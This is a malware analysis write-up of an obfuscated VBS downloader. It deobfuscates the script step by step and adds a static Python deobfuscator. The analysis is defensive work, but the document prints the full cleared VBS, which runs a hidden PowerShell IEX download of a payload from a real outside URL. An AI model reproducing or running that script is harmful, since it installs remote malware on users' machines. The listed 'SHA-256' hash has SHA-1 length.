Malware Analysis - VBS mp3 Downloader

Hi! Here is a simple malware analysis of a VBS script I found on Malware Bazaar.
Enjoy!
Identification
Name | 71f51f194201d9d3a86fa99255909017632302bd7007b50b400490a5cd4a4043.vbs
---|---
Hash (256) | 3dbfb4bcbc5432a332fa3f21ffcefcf2cbf1c990
Size | 71K
From | https://bazaar.abuse.ch/download/71f51f194201d9d3a86fa99255909017632302bd7007b50b400490a5cd4a4043/
VBS - Code
Hello there!
Today we are going to look at a VBS script and see what's inside.
Here is the VirusTotal result: only 17 engines (EDR/antivirus vendors) flag this file as malicious. Judging by the title and tags, it seems to be a downloader trojan.
Clear code - comments
First we need to remove the comments, since there are a lot of them in the code. Comments are used very often inside script files such as VBS to hide the real logic.
There are about 30 lines of comments and, since we don't need them, we can get rid of them with Search & Replace in Sublime Text (CTRL+H).
Using the regex ^.*msad.*\n we select all the comment lines and leave the replacement field empty. With the comments gone the code is more readable, but still a mess.
All the code now fits on one screen.
Clear code - First Variables
We can see some string variables at the start. If we look quickly into them we can spot some readable text like System, Replace() and an interesting URL, ate.amazonaws.com/1643406871-d.mp3. It looks like a C&C URL or a malware URL, but for now let's keep going.
I pasted the variables inside a python script and renamed them var followed by a number to be more convenient.
This obfuscation technique is well known: these long strings contain actual readable code between junk characters; the readable parts are extracted and then executed. It is an obfuscation method used to bypass any antivirus that would ask too many questions about the content of the file.
Sometimes you also see random code and random function calls placed between the malicious code just to fool EDRs.
Below the 9 variables we can see another variable using a replace statement:
diTG = replace("WYePOcript.YePOhEll","YePO","s")
Using the same method in python gives us the name of the shell object, here Wscript.shell.
The idea is to do the same with a python script on the 9 variables and see what they have to offer.
The result is not really explicit, since it turns out to be another obfuscation layer similar to the first one.
In this output we start to see some PowerShell code and, most of all, the full URL:
https://v3-fastupload.s3-accelerate.amazonaws.com/1643406871-d.mp3
We could stop the analysis here, since we have the URL that seems to download the real malware, but let's keep going.
Here is the previous python output in a better view, with renamed variables.
Since this is a PowerShell script, we can clearly see what's going on: like we did in python, this script joins every string variable into one $final_var. Let's build the same thing in python and check the content of this $final_var, shall we.
# Each fragment hides a readable piece behind a junk token that .Replace() removes
another_var1='(NixwTc6t'.replace('ixwTc6t','ew-')      # (New-
another_var2 = '8hZqv4S '.replace('8hZqv4S','Object')  # Object
another_var3 = 'N10t1mbR'.replace('10t1mbR','et')      # Net
another_var4 = '.WVImHNDj'.replace('VImHNDj','e')      # .We
another_var5='.D3Z279nZ'.replace('3Z279nZ','ownlo')    # .Downlo
another_var6= 'bfqeWWCp'.replace('fqeWWCp','Client)')  # bClient)
another_var7='adString("https://v3-fastupload.s3-accelerate.amazonaws.com/1643406871-d.mp3")'
# Same order as the PowerShell -Join: note that var6 is joined before var5
final_var= another_var1 + another_var2 + another_var3 + another_var4 + another_var6 + another_var5 + another_var7
print(final_var)  # (New-Object Net.WebClient).DownloadString("https://v3-fastupload.s3-accelerate.amazonaws.com/1643406871-d.mp3")
As expected, this PowerShell command line downloads the mp3 file located at this URL; this is certainly the location of the real malware.
Don't forget the CreateObject() function used before the Replace() calls.
The CreateObject function creates an object of a specified type, here a WScript.Shell object:
Set GmrK = CreateObject(wscipt_shell)
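To automate the steps of this section (drop the filler comment lines, apply the script's own Replace() calls to remove the junk token, then fold the PowerShell 'x'.Replace() calls and the -Join into the final command) without ever executing the VBS or the PowerShell, here is an added Python example. It is not code from the original post. It runs on a constructed sample written in the same style (much shorter junk tokens, filler comments carrying the same msad marker the write-up's regex looks for, and a URL on the reserved example.invalid domain), not on the real file. The function names, the INDICATORS list and the assumption that the fragments are concatenated in definition order are mine.

```python
import re

# Constructed sample in the style of the analysed script (filler comment lines,
# VBS junk token stripped by Replace(), then PowerShell 'x'.Replace() and -Join).
# It is NOT the original file from Malware Bazaar; the junk token is much shorter
# and the URL points at the reserved example.invalid domain.
SAMPLE_VBS = r"""on error resume next
' msadkq 83hf filler comment number one
' wmsad lorem ipsum filler comment number two
Dim var1,var2,var3
var1 = "$a=6!/*!\!7'(N6!/*!\!7ixw'.Replace('ixw6!/*!\!7','ew-');"
var2 = "$b=3!/*!\!9'Obj3!/*!\!98hZ'.Replace('8hZ','ect Net.3!/*!\!9WebClient).Downlo');"
var3 = "[Sys5!/*!\!1tem.Threading.Thread]::Sl5!/*!\!1eep(153);$c='adString(''https://example.invalid/payload.mp3'')';$d=I`E`X ($a,$b,$c -Join '')|I`E`X"
Set o = CreateObject(Replace("WYePOcript.YePOhEll","YePO","s"))
var1 = Replace(var1, "6!/*!\!7", "")
var2 = Replace(var2, "3!/*!\!9", "")
var3 = Replace(var3, "5!/*!\!1", "")
o.Run "powershell " + var1 + var2 + var3, 0
"""

# Layer 0: filler comments. The default pattern is the one used in the write-up's
# Sublime Text search-and-replace; adapt the marker to the sample at hand.
def strip_comment_lines(vbs_text, pattern=r'^.*msad.*\n'):
    return re.sub(pattern, '', vbs_text, flags=re.M)

# Layer 1: VBS string literals and the script's own  varN = Replace(varN, "<junk>", "")
VBS_STRING = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"\n]|"")*)"\s*$', re.M)
VBS_JUNK = re.compile(r'^\s*(\w+)\s*=\s*Replace\(\s*\1\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.M | re.I)

def strip_vbs_junk(vbs_text):
    """Return {var: cleaned string}: apply each Replace() the script declares,
    in source order, to the literal it targets. Nothing is executed."""
    strings = {m.group(1): m.group(2).replace('""', '"') for m in VBS_STRING.finditer(vbs_text)}
    for name, junk, repl in VBS_JUNK.findall(vbs_text):
        if name in strings:
            strings[name] = strings[name].replace(junk, repl)
    return strings

# Layer 2: the PowerShell fragments. PS_STR is a single-quoted literal ('' escapes a quote).
PS_STR = r"'((?:[^']|'')*)'"
PS_REPLACE = re.compile(PS_STR + r"\.Replace\(" + PS_STR + r"\s*,\s*" + PS_STR + r"\)", re.I)
PS_ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + PS_STR + r"\s*;")
PS_JOIN = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-Join\s+''\s*\)", re.I)

def _unq(s):
    return s.replace("''", "'")

def _q(s):
    return "'" + s.replace("'", "''") + "'"

def fold_replace_calls(ps):
    """Rewrite every 'abc'.Replace('b','x') into the literal it evaluates to;
    loop until stable so chained calls are folded as well."""
    prev = None
    while prev != ps:
        prev = ps
        ps = PS_REPLACE.sub(lambda m: _q(_unq(m.group(1)).replace(_unq(m.group(2)), _unq(m.group(3)))), ps)
    return ps

def resolve_join(ps):
    """Evaluate  $name = '<literal>';  assignments and expand ($a,$b,... -Join '')
    into one literal. Returns (rewritten PowerShell, list of joined literals)."""
    env = {name: _unq(value) for name, value in PS_ASSIGN.findall(ps)}
    joined = []
    def expand(m):
        names = re.findall(r'\$(\w+)', m.group(1))
        joined.append(''.join(env.get(n, '<unresolved $%s>' % n) for n in names))
        return _q(joined[-1])
    return PS_JOIN.sub(expand, ps), joined

# Tokens worth flagging in a downloader of this kind (my list, not the post's)
INDICATORS = ('IEX', 'Invoke-Expression', 'New-Object', 'DownloadString', 'WebClient', 'Sleep')

def analyse(vbs_text):
    """Whole pipeline, statically: rebuilt command(s), URLs and suspicious tokens."""
    fragments = strip_vbs_junk(strip_comment_lines(vbs_text))
    # Assumption: fragments are concatenated in definition order, as both the
    # sample and the analysed script do (var1 + var2 + ... in the .Run line).
    ps = fold_replace_calls(''.join(fragments.values()))
    # I`E`X -> IEX. Dropping every backtick is fine for this family but is a
    # simplification: the backtick is PowerShell's general escape character.
    ps, commands = resolve_join(ps.replace('`', ''))
    low = ps.lower()
    return {
        'powershell': ps,
        'commands': commands,
        'urls': sorted(set(re.findall(r"https?://[^\s'\"()]+", ps))),
        'indicators': [t for t in INDICATORS if t.lower() in low],
    }

if __name__ == '__main__':
    for key, value in analyse(SAMPLE_VBS).items():
        print(key + ':', value)
```

Because the junk tokens and the Replace() calls are read from the script itself, the same three layers apply to the real sample (nine fragments, the long !/*!\! token) without copying anything by hand, and the result is the URL plus the rebuilt (New-Object Net.WebClient).DownloadString(...) command that the write-up derives manually. The script is only ever parsed as text; neither the VBS nor the PowerShell is run.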
Clear code - Last part
Here is the last part with clear variable names.
We can see two variables being created. The first one stores the content of the powershell command used to call powershell.exe from a Windows prompt.
The second one, which I renamed powershell_full_cmd_download, stores the full PowerShell command together with the powershell call.
The InStr() function does not seem to do anything: it compares the number of characters in the PowerShell command, checks whether the result is greater than zero and then does nothing, because the If block is empty (and with On Error Resume Next at the top of the script, an error raised by InStr would be silently ignored anyway).
At the end we can see the WScript.Shell object running the PowerShell command, which downloads its content onto the computer.
VBS - mp3
I still managed to download the mp3 file using wget on my Linux box.
Unfortunately there is no part 2, since I lost the final part 👺
clear-code.vbs
Here is the cleared VBS code
on error resume next
Dim var1,var2,var3,var4,var5,var6,var7,var8,var9
var1 = " $6!/*!\!7!/*!\!1!/*!\!4!/*!\!4LvLJJRX=6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'(N6!/*!\!7!/*!\!1!/*!\!4!/*!\!4ixwTc6t6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'.Replace(6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'6!/*!\!7!/*!\!1!/*!\!4!/*!\!4ixwTc6t6!/*!\!7!/*!\!1!/*!\!4!/*!\!4',6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'ew-6!/*!\!7!/*!\!1!/*!\!4!/*!\!4');"
var2 = "[7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5System.Thr7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5eading.Th7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5read]::Sl7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5eep(153);$7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!55wQo1Xb = 7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!58hZqv4S 7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'.Replace(7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!58hZqv4S7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5',7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'Object7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5');"
var3 = "$7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1xji96z8 = '7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1N10t1mbR'7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1.Replace('10t1mbR7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1','et');$msqT7OS = '.WVImHNDj'.Replace('VImHNDj',7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1'e7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1');"
var4 = "3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2[System.T3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2hreading.Thr3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2ead]::Sl3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2eep(690);$ofZFAIi='.D3Z279nZ'.Replace(3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!23Z279nZ3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2',3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'ownlo3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2);"
var5 = "$1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5j7i23VG1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5 = 'bfqeWWCp'.Replace('fqeWWCp','Cl1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5ient)');$D2buXdn='adString(''htt1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5ps://v3-fastupload.s3-acceler"
var6 = "0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9ate.amazonaws.com/1643406871-d.mp3'')';[Sy0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9stem.Th0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9reading.Thre0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9ad]::Sl0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9eep(408)0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9;"
var7 = "8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6$2WigeHE=I`E8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6`X ($LvLJJRX8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6,$8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!65wQo1Xb,$8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6xji96z8,"
var8 = "$9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4msqT7OS9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4,$9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4j7i23VG9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4,"
var9 = "$0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3ofZFAIi0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3,$0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3D2buXdn -Jo0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3in ''0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3)|I`E`0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3X"
' "Wscript.shell" is hidden behind a Replace() call, then instantiated
wscript_name = replace("WYePOcript.YePOhEll","YePO","s")
Set Object_wscript = CreateObject(wscript_name)
' Below: each fragment has its junk token removed by the script itself
var1 = Replace(var1, "6!/*!\!7!/*!\!1!/*!\!4!/*!\!4", "")
var2 = Replace(var2, "7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5", "")
var3 = Replace(var3, "7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1", "")
var4 = Replace(var4, "3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2", "")
var5 = Replace(var5, "1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5", "")
var6 = Replace(var6, "0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9", "")
var7 = Replace(var7, "8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6", "")
var8 = Replace(var8, "9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4", "")
var9 = Replace(var9, "0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3", "")
Dim powershell_full_cmd_download
Dim powershell_exe
' "powershell" is itself hidden behind a Replace() call
powershell_exe = Replace("198034638323898147433896822085shell","198034638323898147433896822085","power")
' Dead code: the If block is empty, so this check changes nothing
If InStr(var1,var2,var3,var4,var5,var6,var7,var8,var9, "") > 0 Then
End If
' Full command line: "powershell" followed by the nine cleaned fragments
powershell_full_cmd_download = powershell_exe+var1+var2+var3+var4+var5+var6+var7+var8+var9
' Run it through WScript.Shell with window style 0 (hidden window)
Object_wscript.Run powershell_full_cmd_download,0